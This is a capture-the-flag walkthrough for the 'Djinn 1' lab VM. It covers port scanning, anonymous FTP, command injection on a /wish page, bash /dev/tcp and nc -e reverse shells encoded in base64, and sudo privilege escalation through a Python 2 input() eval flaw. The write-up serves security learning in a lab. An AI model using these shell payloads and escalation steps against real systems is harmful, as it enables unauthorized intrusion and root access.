# Djinn 1

## Enumeration

### nmap

```
nmap -sC -sV -oA nmap/djinn 192.168.1.110
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 03:22 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00015s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              11 Oct 20  2019 creds.txt
| -rw-r--r--    1 0        0             128 Oct 21  2019 game.txt
|_-rw-r--r--    1 0        0             113 Oct 21  2019 message.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.113
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp filtered ssh
MAC Address: 00:0C:29:3A:97:CE (VMware)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds

```

```
nmap -p- -Pn 192.168.1.110
```

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-22 04:17 EDT
Nmap scan report for 192.168.1.110
Host is up (0.00066s latency).
Not shown: 65531 closed ports
PORT     STATE    SERVICE
21/tcp   open     ftp
22/tcp   filtered ssh
1337/tcp open     waste
7331/tcp open     swx
MAC Address: 00:0C:29:3A:97:CE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds

```

The full port scan shows two more ports that the default top-1000 scan missed, `1337` and `7331`. The service names nmap prints for them (`waste`, `swx`) are only port-table guesses, since this scan ran without `-sV`.

### FTP

The first scan showed that anonymous login is allowed. Let's try it:

```
ftp 192.168.1.110
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wbeiOFMwb2sTX2vj6%2Fimage.png?alt=media\&token=6aeefb68-6373-4d71-8e46-d3ed6cf02ed8)

Then we can list the files with the `ls` command:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wboqczKhe1yTRRMCk%2Fimage.png?alt=media\&token=cd52d6b2-744c-4e97-b5df-885d83c659f3)

There are 3 files inside. Let's use the `get` command to download all three:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wc6Na7-EFRS7fMHrY%2Fimage.png?alt=media\&token=5b7f4383-0e04-4f5c-86e7-c56e472f52d9)

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wcDLL0x_S_1wqd0H5%2Fimage.png?alt=media\&token=e1b32b83-7e55-4391-83b7-85892631cc9e)

The screenshots above show the contents of the three files.

### More Discovery

Port 1337 came up in the full port scan, so let's look at it in the browser first:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wca_uj8wFA8jznX_2%2Fimage.png?alt=media\&token=55c81dad-12c9-471b-8b1c-617c7a93d83a)

It is not HTTP, so let's connect to it with `netcat` instead:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wd5r5COnR3QSzhHO6%2Fimage.png?alt=media\&token=09aa1f6f-b0b9-47dc-9248-2499660bedfe)

The game wants us to answer 1000 questions, and I don't think it will give us our gift even then, so let's move on to the other port, 7331.
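If you would rather play the port 1337 game than skip it, the usual approach is to script it. The solver below is an added example and is not part of the original writeup. The page never shows the prompt format, so the `(9, '+', 5)` tuple style matched by `PROMPT_RE` is an assumption to adapt to what the service actually prints. Answers are computed through an explicit operator table rather than `eval()`, so hostile prompt text from the server can never execute code on the attacking machine.

```python
import operator
import re
import socket

# Assumed prompt format for the arithmetic game on port 1337 (not shown on
# the page): a Python-style tuple such as "(9, '+', 5)".  Adjust PROMPT_RE if
# the real service prints something else.
PROMPT_RE = re.compile(r"\(\s*(-?\d+)\s*,\s*'([-+*/%])'\s*,\s*(-?\d+)\s*\)")

# Explicit operator table: never eval() text received from a remote service.
OPS = {
    "+": operator.add,
    "-": operator.sub,
    "*": operator.mul,
    "/": operator.truediv,
    "%": operator.mod,
}


def solve_prompt(text):
    """Return the answer for the first arithmetic tuple found in text, or None."""
    m = PROMPT_RE.search(text)
    if not m:
        return None
    a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
    if op in "/%" and b == 0:
        return None  # refuse to answer a malformed question instead of crashing
    result = OPS[op](a, b)
    # Division is assumed to be exact in the game; keep integers as integers.
    if isinstance(result, float) and result.is_integer():
        result = int(result)
    return result


def play(host, port, rounds=1000, timeout=5.0):
    """Connect to the game and answer prompts until the server stops asking.

    Returns (answered, last_banner) so the caller can read whatever the server
    prints after the final round (this is where a "gift" would appear).
    """
    answered = 0
    buf = b""
    with socket.create_connection((host, port), timeout=timeout) as s:
        while answered < rounds:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            buf += chunk
            answer = solve_prompt(buf.decode(errors="replace"))
            if answer is None:
                continue  # prompt not complete yet, or not a question
            s.sendall(("%s\n" % answer).encode())
            answered += 1
            buf = b""
        # Drain whatever the server says after the last answer.
        try:
            buf += s.recv(65536)
        except (socket.timeout, OSError):
            pass
    return answered, buf.decode(errors="replace")


if __name__ == "__main__":
    import sys
    # Usage (hypothetical target): python3 solver.py 192.168.1.110 1337
    n, banner = play(sys.argv[1], int(sys.argv[2]))
    print("answered %d prompts" % n)
    print(banner)
```

If the server sends several prompts in one packet or splits one across packets, the buffer logic above still works because the buffer is only cleared after a complete tuple has been answered.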

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wT23nQiC4S60shixD%2F-M7wdVVxxZ3QBblG41HP%2Fimage.png?alt=media\&token=e61714d5-9374-4968-a22d-15e41dc131bd)

### gobuster

Nothing on the page itself looks interesting, so let's use gobuster to enumerate paths on port 7331:

```
gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://192.168.1.110:7331/
```

```
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.110:7331/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/05/22 11:05:12 Starting gobuster
===============================================================
/genie (Status: 200)
/wish (Status: 200)
===============================================================
2020/05/22 11:06:02 Finished
===============================================================

```

gobuster finds two paths, `/genie` and `/wish`.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x13ZIMfJ-Uh-fWJiz%2Fimage.png?alt=media\&token=ed3d3a09-9629-4053-a264-76ed9d9e4f1e)

Let's navigate to the `/wish` page.

The page runs whatever we submit as a command on the server: typing `id` returns the output of `id` in the response.

### Reverse Shell

But when I set up a listener on my Kali machine and type

```
nc -e /bin/bash 192.168.1.113 444
```

it does not work that way: the raw command is not executed. The workaround is to base64-encode the command and have the target decode it with `base64 -d` and pipe the result into a shell, so the only text the `/wish` handler sees is the `echo ... | base64 -d | bash` wrapper.

Even encoded, the `nc -e` payload still did not give me a shell (`-e` also depends on a netcat build that supports it, which many distributions do not ship). The bash `/dev/tcp` reverse shell only needs bash on the target, and this one works:

```
bash -i >& /dev/tcp/192.168.1.113/4444 0>&1
```

Encode it with base64 (this [website](https://www.base64encode.org/) works, or the local `base64` utility does the same).

Then, with a listener running on port 4444, submit this in `/wish`:

```
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTEzLzQ0NDQgMD4mMQ== | base64 -d | bash
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x5Em0UKtjkzr8OmBh%2Fimage.png?alt=media\&token=114657b2-871f-4c55-9e50-4019e94b85b4)

Once the connection comes back, upgrade to a proper TTY first:

```
python -c 'import pty; pty.spawn("/bin/bash")'
```

Then we can list the working directory and read `app.py`, the application behind `/wish`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x5nvJap9yubc8qwx8%2Fimage.png?alt=media\&token=9bc663eb-fcde-418e-87a2-fec2992a867d)

Then we cat out the credentials file it references:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x6R49G4GZpdOYhgPj%2Fimage.png?alt=media\&token=adf443ca-767c-49a1-bc18-5bcc82ca78a1)

With those credentials we can `su` to the user `nitish`:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x7Tx2LIJcklIEemsh%2Fimage.png?alt=media\&token=7628a7dc-1a89-491f-af78-790d06e647d6)

## Privilege Escalation

As `nitish`, we run `sudo -l` and get this:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x83QkEfTfST2Yu3lK%2Fimage.png?alt=media\&token=7f9d203b-c9c7-4501-86a4-4922966c0dec)

`genie` is a binary we can run as `sam`. We can use the `strings` command to list its readable strings and look for hidden options:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zX4nqkQlRaejllmym%2F-M7zYkJMK9BwBwl7c5XF%2Fimage.png?alt=media\&token=5aeafa58-557b-4663-b023-211f10e4608d)

We can see there is a `-cmd` parameter that can be passed to it.

After playing around with it, we can get a shell as the `sam` user by typing

```
sudo -u sam genie -cmd new 
```

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x9jQOzs_BGUENF2rQ%2Fimage.png?alt=media\&token=a1d5ff0a-dc02-4fab-acce-1c2e68e6b98c)

As `sam`, we run `sudo -l` again:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7x9rOIbEpnaiT3Aps7%2Fimage.png?alt=media\&token=8e69dfe8-247f-452b-b7bf-c9ac372238aa)

Running `sudo /root/lago` shows us this menu:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zYxRsEZbrZuMtDEws%2F-M7zyX_EkOaO2bIfxgmo%2Fimage.png?alt=media\&token=b5ee3750-7dea-4eac-9c6a-a0f90ed00421)

Whichever option we choose, the selection does not get us anywhere useful.

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zYxRsEZbrZuMtDEws%2F-M7zyhpRpaORI3YhmiDY%2Fimage.png?alt=media\&token=20192353-45e7-4ffb-b7f0-9ca4910a68ef)

So let's look around the `/home/sam` directory instead.

`ls -la` shows the hidden files, including a `.pyc` file:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7zYxRsEZbrZuMtDEws%2F-M7zyKUt9vydF8xkjkaY%2Fimage.png?alt=media\&token=1745c201-79a4-4778-8224-26a35c9c3590)

Then we can use netcat to transfer the `.pyc` file to our machine. netcat gives no end-of-transfer signal, so compare a checksum (`md5sum` or `sha256sum`) on both sides before trusting the copy.

Our machine

```
nc -nlvp 9000 > abc.pyc
```

Target machine

```
nc -nv 192.168.1.113 9000 < .pyc
```

A `.pyc` file is compiled Python bytecode, not source. We can decompile it with uncompyle6 to recover the source; the banner it prints also tells us which interpreter produced the bytecode (here Python 2.7, magic 62211).
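Before running a decompiler it is worth reading the `.pyc` header yourself, because uncompyle6 only handles bytecode up to Python 3.8 and a newer file needs a different tool (pycdc, for example). The script below is an added example, not code from the page or the box: it parses the magic word and compile timestamp from the header and suggests a decompiler. The magic-word table, the function names and the constructed 2.7 header are my own; the file path in the usage line is an assumption.

```python
import importlib.util
import struct
import sys
from datetime import datetime, timezone

# Magic words (first two header bytes, little-endian) for interpreters a CTF
# box is likely to ship.  62211 is the value the uncompyle6 banner shows for
# the lago .pyc, i.e. CPython 2.7 bytecode.
KNOWN_MAGIC = {
    62211: (2, 7),
    3379: (3, 6),
    3394: (3, 7),
    3413: (3, 8),
    3425: (3, 9),
    3439: (3, 10),
    3495: (3, 11),
    3531: (3, 12),
}

CURRENT_VERSION = sys.version_info[:2]


def pyc_info(data):
    """Parse a .pyc header; return (magic, version_tuple_or_None, mtime_or_None)."""
    if len(data) < 8 or data[2:4] != b"\r\n":
        raise ValueError("not a .pyc header (expected magic word + CRLF)")
    magic = struct.unpack("<H", data[:2])[0]
    if data[:4] == importlib.util.MAGIC_NUMBER:
        version = CURRENT_VERSION             # produced by this interpreter's version
    else:
        version = KNOWN_MAGIC.get(magic)      # None if the table has no entry
    mtime = None
    if version is not None:
        if version < (3, 7):
            ts_off = 4                        # 2.x and 3.0-3.6: magic, mtime[, size]
        else:
            flags = struct.unpack("<I", data[4:8])[0]
            ts_off = 8 if flags == 0 else None  # 3.7+: magic, flags, mtime-or-hash, size
        if ts_off is not None and len(data) >= ts_off + 4:
            ts = struct.unpack("<I", data[ts_off:ts_off + 4])[0]
            mtime = datetime.fromtimestamp(ts, timezone.utc)
    return magic, version, mtime


def pick_decompiler(version):
    """uncompyle6 stops at 3.8; newer bytecode needs a different tool."""
    if version is None:
        return "unknown bytecode version: try pycdc"
    if version <= (3, 8):
        return "uncompyle6"
    return "pycdc (uncompyle6 does not support this version)"


def current_interpreter_header(mtime=86400):
    """Constructed header in the 3.7+ layout for the running interpreter (for testing)."""
    return importlib.util.MAGIC_NUMBER + b"\x00\x00\x00\x00" + struct.pack("<I", mtime) + b"\x00\x00\x00\x00"


if __name__ == "__main__":
    # Usage (hypothetical path): python3 pycinfo.py abc.pyc
    with open(sys.argv[1], "rb") as f:
        header = f.read(16)
    magic, version, mtime = pyc_info(header)
    print("magic=%d version=%s compiled=%s -> %s" % (magic, version, mtime, pick_decompiler(version)))
```

A constructed Python 2.7 header such as `b"\x03\xf3\r\n\x80\x51\x01\x00"` (magic 62211, timestamp 86400) is reported as version `(2, 7)` with a 1970-01-02 compile time, and `pick_decompiler` points at uncompyle6, matching the banner the real file produces below.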

```
uncompyle6 abc.pyc
```

```
# uncompyle6 version 3.7.0
# Python bytecode 2.7 (62211)
# Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 
# [GCC 9.3.0]
# Embedded file name: /home/mzfr/scripts/exp.py
# Compiled at: 2019-11-07 08:05:18
from getpass import getuser
from os import system
from random import randint

def naughtyboi():
    print 'Working on it!! '


def guessit():
    num = randint(1, 101)
    print 'Choose a number between 1 to 100: '
    s = input('Enter your number: ')
    if s == num:
        system('/bin/sh')
    else:
        print 'Better Luck next time'


def readfiles():
    user = getuser()
    path = input('Enter the full of the file to read: ')
    print 'User %s is not allowed to read %s' % (user, path)


def options():
    print 'What do you want to do ?'
    print '1 - Be naughty'
    print '2 - Guess the number'
    print '3 - Read some damn files'
    print '4 - Work'
    choice = int(input('Enter your choice: '))
    return choice


def main(op):
    if op == 1:
        naughtyboi()
    elif op == 2:
        guessit()
    elif op == 3:
        readfiles()
    elif op == 4:
        print 'work your ass off!!'
    else:
        print 'Do something better with your life'


if __name__ == '__main__':
    main(options())
# okay decompiling abc.pyc

```

Here is the bug. `lago` is Python 2, and Python 2's `input()` is `eval(raw_input())`: whatever is typed is evaluated as a Python expression in the caller's scope. If we type `num` at the guess prompt, it evaluates to the variable `num` itself, so `s == num` is always true and `/bin/sh` is spawned with the privileges `lago` runs under, which is root via `sudo`. (The `readfiles()` path prompt uses `input()` too, so it has the same problem.)
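To see why `num` wins, here is an added illustration (not code from the page or from the `lago` binary) that emulates Python 2's `input()` on Python 3, where `input()` returns a plain string. `py2_input`, `guessit_vulnerable`, `guessit_fixed` and `simulated_lago_round` are my own names; `num` and the `randint(1, 101)` call mirror the decompiled source above. The fixed variant shows the minimal repair: parse the text as an integer and never evaluate it.

```python
import random


def py2_input(text, namespace):
    """Emulate Python 2 input(): evaluate the typed text as an expression.

    `namespace` stands in for the globals and locals visible at the call
    site; in lago that scope includes `num`, `system` and `randint`.
    """
    return eval(text, dict(namespace))


def guessit_vulnerable(typed, num):
    """Mirror of lago's guessit(): True means system('/bin/sh') would run."""
    s = py2_input(typed, {"num": num})
    return s == num


def guessit_fixed(typed, num):
    """Hardened version: parse the text as an integer, never evaluate it."""
    try:
        s = int(typed.strip())
    except ValueError:
        return False
    return s == num


def simulated_lago_round(typed):
    """One round of the game with the secret chosen exactly as lago does."""
    num = random.randint(1, 101)
    return guessit_vulnerable(typed, num)


if __name__ == "__main__":
    print("typing 'num' against the vulnerable game:", simulated_lago_round("num"))
    print("typing 'num' against the fixed game:     ", guessit_fixed("num", random.randint(1, 101)))
```

Any expression works, not just `num`; the emulation shows `num * 1` passing as well, and a real attacker could just as easily call `system(...)` directly from the prompt since it is in scope. Also note that `randint(1, 101)` is inclusive, so the secret can be 101 even though the prompt says 1 to 100.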

So run `sudo -u root /root/lago`, choose option `2`, and type `num` when it asks for a number between 1 and 100:

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7xAYiyGmMsdlqUZU-a%2Fimage.png?alt=media\&token=ff6a2696-9ea2-4a9b-95ad-d65db37b5469)

Got root !

We then navigate to `/root` directory to get the flag

![](https://1595701629-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-M6jqZqh8dnhmWJDpTuf%2F-M7wpKrDYr4WykBa7tLG%2F-M7xAgaA9oIC5jKhs_G_%2Fimage.png?alt=media\&token=13b07a01-9dda-4167-b1b5-c619de255470)

